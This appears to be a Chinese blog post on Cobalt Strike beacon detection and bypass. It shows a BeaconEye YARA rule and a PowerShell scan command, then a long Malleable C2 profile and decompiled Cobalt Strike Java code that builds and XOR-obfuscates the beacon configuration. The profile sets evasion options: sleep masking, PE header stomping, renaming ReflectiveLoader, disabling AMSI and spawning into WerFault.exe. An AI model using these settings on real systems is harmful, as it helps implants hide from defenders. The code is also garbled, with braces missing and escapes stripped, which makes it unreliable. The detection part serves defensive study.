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关于这几天cs进程里的特征和网上的一些bypass-Pikachu Hacker

遍历进程寻找cs的进程:powershell -command “Get-Process | ForEach-Object {./yara64.exe beaconEye.yar $_.ID -s}”

rule CobaltStrike {
    $cobaltStrikeRule64 = {  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00 (00|01|02|04|08|10) 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00 ?? ?? 00 00 00 00 00 00  02 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00  02 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00  01 00 00 00 00 00 00 00 ?? ?? 00 00 00 00 00 00 }
    $cobaltStrikeRule32 = {  00 00 00 00 00 00 00 00  01 00 00 00 (00|01|02|04|08|10) 00 00 00 01 00 00 00 ?? ?? 00 00  02 00 00 00 ?? ?? ?? ??  02 00 00 00 ?? ?? ?? ??  01 00 00 00 ?? ?? 00 00 }
  condition: any of them

cs的c2profile的sleep_mask是sleep xor加密的算法是否开启


#This profile is meant to show all of the options available in Malleable C2

#Various options

# Append random-length string (up to data_jitter value) to http-get and http-post server output

set sample_name "Test Profile";
set dns_idle "";
set dns_max_txt "252";
set dns_sleep "0";
set dns_stager_prepend "";
set dns_stager_subhost ".stage.123456.";
set dns_ttl "1";
set host_stage "true"; #Host payload for staging over set, setS, or DNS. Required by stagers.
set jitter "0";
set maxdns "255";
set pipename "msagent_###"; #Default name of pipe to use for SMB Beacon’s peer-to-peer communication. Each # is replaced witha random hex value.
set pipename_stager "status_##";
set sleeptime "60000"; #def sleep in ms
set smb_frame_header "";
set ssh_banner "Cobalt Strike 4.2";

set tcp_frame_header "";
set tcp_port "4444";

# Defaults for ALL CS set server responses

http-config {
    set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
    header "Server" "Apache";
    header "Keep-Alive""timeout=5, max=100";
    header "Connection""Keep-Alive";

#   The set trust_x_forwarded_foroption decides if Cobalt Strike uses the
# X-Forwarded-For set header to determine the remote address of a request.
# Use this option if your Cobalt Strike server is behind an set redirector    
    set trust_x_forwarded_for "true";


https-certificate {
    set C "US"; #Country
    set CN "localhost"; # CN - you will probably nver use this, but don't leave at localost
    set L "San Francisco"; #Locality
    set OU "IT Services"; #Org unit
    set O "FooCorp"; #Org name
    set ST "CA"; #State
    set validity "365";

    # if using a valid vert, specify this, keystore = java keystore
    #set keystore "domain.store";
    #set password "mypassword";


#If you have code signing cert:
#code-signer {
#    set keystore "keystore.jks";
#    set password "password";
#    set alias    "server";
#    set timestamp "false";
#    set timestamp_url "set://timestamp.digicert.com";

#Stager is only supported as a GET request and it will use AFAICT the IE on Windows.
http-stager {
    set uri_x86 "/api/v1/GetLicence";     
    set uri_x64 "/api/v2/GetLicence";
    client {
        parameter "uuid" "96c5f1e1-067b-492e-a38b-4f6290369121";
        #header "headername" "headervalue";
    server {
        header "Content-Type" "application/octet-stream";    
        header "Content-Encoding" "gzip";    
        output {        
            #GZIP headers and footers
            prepend "x1Fx8Bx08x08xF0x70xA3x50x00x03";
            append "x7Fx01xDDxAFx58x52x07x00";
            #AFAICT print is the only supported terminator

#This is used only in http-get and http-post and not during stage
set useragent "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";

# define indicators for an set GET
http-get {
    # we require a stub URI to attach the rest of our data to.
    set uri "/api/v1/Updates";

    client {

        header "Accept-Encoding" "deflate, gzip;q=1.0, *;q=0.5";
        # mask our metadata, base64 encode it, store it in the URI
        metadata {

            # XOR encode the value

            # URL-safe Base64 Encode

            # URL-safe Base64 Encode

            # NetBIOS Encode ‘a’ ?

            #NetBIOS Encode ‘A’

            # You probably want these to be last two, else you will encode these values

            # Append a string to metadata
            append ";" ;

            # Prepend a string
            prepend "SESSION=";
            # Terminator statements - these say where the metadata goes
            # Pick one

            # Append to URI

            #Set in a header
            header "Cookie";

            #Send data as transaction body

            #Store data in a URI parameter
            #parameter "someparam"


    server {
        header "Content-Type" "application/octet-stream";
        header "Content-Encoding" "gzip";
        # prepend some text in case the GET is empty.
        output {
            prepend "x1Fx8Bx08x08xF0x70xA3x50x00x03";
            append "x7Fx01xDDxAFx58x52x07x00";            

# define indicators for an set POST
http-post {
    set uri "/api/v1/Telemetry/Id/";
    set verb "POST";

    client {
        # make it look like we're posting something cool.
        header "Content-Type" "application/json";
        header "Accept-Encoding" "deflate, gzip;q=1.0, *;q=0.5";

        # ugh, our data has to go somewhere!
        output {


        # randomize and post our session ID
        id {
            prepend "{version: 1, d=x22";            
            append "x22}n";

    # The server's response to our set POST
    server {
        header "Content-Type" "application/octet-stream";
        header "Content-Encoding" "gzip";

        # post usually sends nothing, so let's prepend a string, mask it, and
        # base64 encode it. We'll get something different back each time.
        output {
            prepend "x1Fx8Bx08x08xF0x70xA3x50x00x03";
            append "x7Fx01xDDxAFx58x52x07x00";            


stage {

#    The transform-x86 and transform-x64 blocks pad and transform Beacon’s
# Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
    transform-x86 {
        prepend "x90x90";
        strrep "ReflectiveLoader" "DoLegitStuff";

    transform-x64 {
        # transform the x64 rDLL stage, same options as with
    stringw "I am not Beacon";

    set cleanup "true";        # Ask Beacon to attempt to free memory associated with
                                # the Reflective DLL package that initialized it.

    # Override the first bytes (MZ header included) of Beacon's Reflective DLL.
    # Valid x86 instructions are required. Follow instructions that change
    # CPU state with instructions that undo the change.

#    set magic_mz_x86 "MZRE";
#    set magic_mz_x86 "MZAR";

    # Ask the x86 ReflectiveLoader to load the specified library and overwrite
    #  its space instead of allocating memory with VirtualAlloc.
    # Only works with VirtualAlloc
    #set module_x86 "xpsservices.dll";
    #set module_x64 "xpsservices.dll";

    # Obfuscate the Reflective DLL’s import table, overwrite unused header content,
    # and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers.
    set obfuscate "false";

    # Obfuscate Beacon, in-memory, prior to sleeping
    set sleep_mask "true";

    # Use embedded function pointer hints to bootstrap Beacon agent without
    # walking kernel32 EAT
    set smartinject "true";

    # Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after
    # it loads Beacon payload
    set stomppe "true";

    # Ask ReflectiveLoader to use (true) or avoid RWX permissions (false) for Beacon DLL in memory
    set userwx "false";

#    set image_size_x86 "512000";
#    set image_size_x64 "512000";
    set entry_point "92145";

    #The Exported name of the Beacon DLL
    #set name "beacon.x64.dll"

    #set rich_header  # I don't understand this yet TODO: fixme

    #TODO: add examples process-inject
process-inject {
        # set how memory is allocated in a remote process
        # VirtualAllocEx or NtMapViewOfSection. The
        # NtMapViewOfSection option is for same-architecture injection only.
        # VirtualAllocEx is always used for cross-arch memory allocations.

        set allocator "VirtualAllocEx";
        # shape the memory characteristics and content
        set min_alloc "16384";
        set startrwx "true";
        set userwx "false";
        transform-x86 {
        prepend "x90x90";
        transform-x64 {
        # transform x64 injected content
        # determine how to execute the injected code
        execute {
            CreateThread "ntdll.dll!RtlUserThreadStart";
post-ex {
    # control the temporary process we spawn to
    set spawnto_x86 "%windir%\syswow64\WerFault.exe";
    set spawnto_x64 "%windir%\sysnative\WerFault.exe";
    # change the permissions and content of our post-ex DLLs
    set obfuscate "true";
    # pass key function pointers from Beacon to its child jobs
    set smartinject "true";
    # disable AMSI in powerpick, execute-assembly, and psinject
    set amsi_disable "true";

    #The thread_hint option allows multi-threaded post-ex DLLs to spawn
    # threads with a spoofed start address. Specify the thread hint as
    # “module!function+0x##” to specify the start address to spoof.
    # The optional 0x## part is an offset added to the start address.
    # set thread_hint "....TODO:FIXME"



processhacker Memory所定位看到的内存是xor过的,MZ头也没了
关于这几天cs进程里的特征和网上的一些bypass-Pikachu Hacker


看到的文章中还有一篇是Hook SleepEx函数,然后进行修改 (由于个人过于垃圾无法复现该文章)

最后就是跟着公众号文章分析了一下cs beacon生成的过程 (详细分析请看wx公众号的文章

BeaconConfig的生成在 BeaconPayload类的 exportBeaconStage函数中


    protected byte[] exportBeaconStage(int paramInt, String paramString1, boolean paramBoolean1, boolean paramBoolean2, String paramString2)
      long l1 = System.currentTimeMillis(); //返回当前世界时间(毫秒)
      byte[] arrayOfByte1 = SleevedResource.readResource(paramString2); //读取对应的dll并解密数据
      if (paramString1.length() > 254) { //如果长度大于254则只读取0~254
        paramString1 = paramString1.substring(0, 254);
      String[] arrayOfString1 = this.c2profile.getString(".http-get.uri").split(" "); //get请求的路径读取
      String[] arrayOfString2 = paramString1.split(",\s*"); //字符串分割
      LinkedList localLinkedList = new LinkedList();
      for (int i = 0; i < arrayOfString2.length; i++) //遍历数据添加到localLinkedList
      while ((localLinkedList.size() > 2) && (CommonUtils.join(localLinkedList, ",").length() > 255))
        str1 = localLinkedList.removeLast() + "";
        String str2 = localLinkedList.removeLast() + "";
        CommonUtils.print_info("dropping " + str2 + str1 + " from Beacon profile for size");
      String str1 = randua(this.c2profile);
      int j = Integer.parseInt(this.c2profile.getString(".sleeptime")); //c2profile延时时间读取
      String str3 = CommonUtils.pick(this.c2profile.getString(".http-post.uri").split(" ")); //post请求的路径
      byte[] arrayOfByte2 = this.c2profile.recover_binary(".http-get.server.output");//server头返回
      byte[] arrayOfByte3 = this.c2profile.apply_binary(".http-get.client");//client请求
      byte[] arrayOfByte4 = this.c2profile.apply_binary(".http-post.client");//post client请求
      int k = this.c2profile.size(".http-get.server.output", 1048576); //get请求返回
      int m = Integer.parseInt(this.c2profile.getString(".jitter"));
      if ((m < 0) || (m > 99)) {
        m = 0;
      int n = Integer.parseInt(this.c2profile.getString(".maxdns"));
      if ((n < 0) || (n > 255)) {
        n = 255;
      int i1 = 0;
      if (paramBoolean1) {
        i1 |= 0x1;
      if (paramBoolean2) {
        i1 |= 0x8;
      long l2 = CommonUtils.ipToLong(this.c2profile.getString(".dns_idle"));
      int i2 = Integer.parseInt(this.c2profile.getString(".dns_sleep")); //dns延迟读取
      Settings localSettings = new Settings(); //beacon配置
      localSettings.addShort(1, i1);
      localSettings.addShort(2, paramInt);
      localSettings.addInt(3, j);
      localSettings.addInt(4, k);
      localSettings.addShort(5, m);
      localSettings.addShort(6, n);
      localSettings.addData(7, this.publickey, 256);
      localSettings.addString(8, CommonUtils.join(localLinkedList, ","), 256);
      localSettings.addString(9, str1, 128);
      localSettings.addString(10, str3, 64);
      localSettings.addData(11, arrayOfByte2, 256);
      localSettings.addData(12, arrayOfByte3, 256);
      localSettings.addData(13, arrayOfByte4, 256);
      localSettings.addData(14, CommonUtils.asBinary(this.c2profile.getString(".spawnto")), 16);
      localSettings.addString(29, this.c2profile.getString(".post-ex.spawnto_x86"), 64);
      localSettings.addString(30, this.c2profile.getString(".post-ex.spawnto_x64"), 64);
      localSettings.addString(15, "", 128);
      localSettings.addShort(31, QuickSecurity.getCryptoScheme());
      localSettings.addInt(19, (int)l2);
      localSettings.addInt(20, i2);
      localSettings.addString(26, this.c2profile.getString(".http-get.verb"), 16);
      localSettings.addString(27, this.c2profile.getString(".http-post.verb"), 16);
      localSettings.addInt(28, this.c2profile.shouldChunkPosts() ? 96 : 0);
      localSettings.addInt(37, this.c2profile.getInt(".watermark"));
      localSettings.addShort(38, this.c2profile.option(".stage.cleanup") ? 1 : 0);
      localSettings.addShort(39, this.c2profile.exerciseCFGCaution() ? 1 : 0);
      String str4 = this.listener.getHostHeader();
      if ((str4 == null) || (str4.length() == 0)) {
        localSettings.addString(54, "", 128);
      } else if (Profile.usesHostBeacon(this.c2profile)) {
        localSettings.addString(54, "", 128);
      } else {
        localSettings.addString(54, "Host: " + this.listener.getHostHeader() + "rn", 128);
      if (Profile.usesCookieBeacon(this.c2profile)) {
        localSettings.addShort(50, 1);
      } else {
        localSettings.addShort(50, 0);
      ProxyServer localProxyServer = ProxyServer.parse(this.listener.getProxyString()); //代理
      setupPivotFrames(this.c2profile, localSettings);
      setupGargle(localSettings, paramString2);
      new ProcessInject(this.c2profile).apply(localSettings);
      byte[] arrayOfByte5 = localSettings.toPatch();
      arrayOfByte5 = beacon_obfuscate(arrayOfByte5); //xor
      String str5 = CommonUtils.bString(arrayOfByte1);
      int i3 = str5.indexOf("AAAABBBBCCCCDDDDEEEEFFFF");
      str5 = CommonUtils.replaceAt(str5, CommonUtils.bString(arrayOfByte5), i3);
      return CommonUtils.toBytes(str5);
    catch (IOException localIOException)
      MudgeSanity.logException("export Beacon stage: " + paramString2, localIOException, false);
    return new byte[0];


转载原创文章请注明,转载自: Pikachu Hacker » 关于这几天cs进程里的特征和网上的一些bypass
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